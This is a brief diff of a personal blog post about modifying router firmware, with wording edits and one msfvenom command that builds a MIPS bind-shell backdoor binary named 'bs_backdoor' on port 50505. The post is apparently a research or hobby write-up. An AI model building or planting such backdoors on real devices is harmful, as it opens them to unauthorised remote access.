MaximAshin/MaximAshin.github.io/_posts/2022-10-16-modifying-router-firmware.md

 ![image](https://user-images.githubusercontent.com/53023744/196055645-ef0680da-0e41-45f0-8bd2-2f577fc7628f.png)

-As we can see, I can create a simple bind shell (listens in a given port and waits for a connection).
+As we can see, I can created a simple bind shell (listens on a given port and waits for a connection).
-We can create the binary itself like so:

 ```
 msfvenom -p linux/mipsle/shell_bind_tcp LPORT=50505 -f elf > bs_backdoor